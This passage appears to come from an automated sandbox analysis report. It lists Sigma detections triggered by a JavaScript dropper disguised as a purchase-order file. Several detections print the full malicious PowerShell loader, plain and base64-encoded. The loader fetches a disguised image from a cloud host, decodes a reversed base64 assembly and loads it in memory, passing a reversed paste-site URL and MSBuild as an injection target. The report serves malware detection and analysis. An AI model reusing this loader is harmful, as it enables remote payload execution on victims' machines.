AdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAH
                      Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F
                      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAH
                      Sigma detected: Script Initiated Connection to Non-Local Network
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 151.101.193.137, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49710
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, ProcessId: 7068, ProcessName: wscript.exe
                      Sigma detected: Silenttrinity Stager Msbuild Activity
                      Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7040, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49722
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6884, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js, ProcessId: 7068, ProcessName: wscript.exe
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ProcessId: 6884, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAH
                      Sigma detected: Script Initiated Connection
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 151.101.193.137, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6884, Protocol: tcp, SourceIp: 192.168.2.12, SourceIsIpv6: false, SourcePort: 49710
                      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F
                      Sigma detected: Usage Of Web Request Commands And Cmdlets
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::F
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js", ProcessId: 6884, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBb